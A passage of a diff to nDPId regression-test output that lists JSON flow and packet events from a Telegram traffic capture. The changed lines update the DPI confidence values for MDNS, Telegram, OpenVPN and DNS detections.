{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1588779615962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1588779615962,"pkt":"MzMAAAD78KNaMBgSht1gBhFuADkR\/\/6AAAAAAAAABNzt7FsMpmH\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5dUAAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABERC0AAEARERTAqAFNW2wIB1qGAgkAMLAM3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8o+UYRJgGi8A=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEWYkAAEAR97nAqAFNW2wMBVqGAgsAMMZE3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/VYJzCLkR9XA=="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEZqwAAEAR5prAqAFNW2wQAVqGAg8AMLyJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9u+DapRNA5DQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEMZgAAEARH6\/AqAFNW2wMAVqGAhgAMB7S3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8nsGAWUhbrUA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABECJIAAEARTK7AqAFNW2wICFqGAhoAMJgJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8HjiXC2fxIoA=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEVZYAAEAR963AqAFNW2wQBFqGAhoAMGBV3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8kkP6VHClAVg=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1588779616070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616070,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcvxJAADMRYxZbbAgHwKgBTQIJWoYASDvF3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeKPlGESYBovAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1588779616076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616076,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc0gJAADMRUCVbbAgIwKgBTQIaWoYASCPC3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeB44lwtn8SKAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1588779616161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779616161,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcHlxAADQR\/s5bbAwFwKgBTQILWoYASFH93EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJe1WCcwi5EfVwAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="} 
@@ -113,78 +113,78 @@ 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617174,"pkt":"8KNaMBgSKDc3AG3ICABFAABsqlYAAEARTFnAqAFNwKgBNFqGevgAWLgQjfykZ0OTWbVGSN3cMHZvNB3RufFF5FIV8MQ0P3KjKgWFEWl4FO4hV\/puQOILS4RjUor87I6iIoOnx\/A9NueumG+cX0HrNbBHt0bLwMXSB9A="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617174,"pkt":"EBMx8Tl2KDc3AG3ICABFAABs\/QcAAEARlrXAqAFNVwvNw1qG7TMAWH9So7C\/sNzcuk+cyiR2EyU9Q\/nbaTxTjDBemDeFTsb5lNpyEwlgOlPEUd9m7ay58cjORIuAWP8IcwSg0vb1EIxOrmmqeB4nTaYDWzAgf8R5\/bQ="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1588779617350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617350,"pkt":"KDc3AG3I8KNaMBgSCABFAABsUAUAAEARpqrAqAE0wKgBTXr4WoYAWLDM6Td5ePjQrnTyke2EPHu3iQJhxLIf06esu8RwrHmFIT7cHf5ycIamk2yhxwjAfE09exZIgAEDzMDiso7KFMuIe8fjwzyyS3MKiG+Cd3eNuy0="} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1588779617856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1588779617856,"pkt":"KDc3AG3I8KNaMBgSCABFAABsRZ4AAEARsRHAqAE0wKgBTXr4WoYAWPxjToIQs5m5XoZB1qDehmfhJomQUeopOlZuJIIaL6qE8BgtmXQ6sqxHJAacGMTU5S5RgUjUPrOpUP\/aPObI3ORz5PRGJjnynufzdcsxdb\/ZTPY="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1588779618677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1588779618677,"pkt":"EBMx8Tl2KDc3AG3ICABFAABMg0kAAEAREJTAqAFNVwvNw1qG7TMAOE0OU2RiXNjy8sJRKs8KhnTyEy6Nhnt95vQlharNkBkXr2lvtMgl2dlHhYY4WvPjXQkp"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1588779619914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779619914,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHqTUAAEARTdLAqAFNwKgBAbgXADUAM25TALgBAAABAAAAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
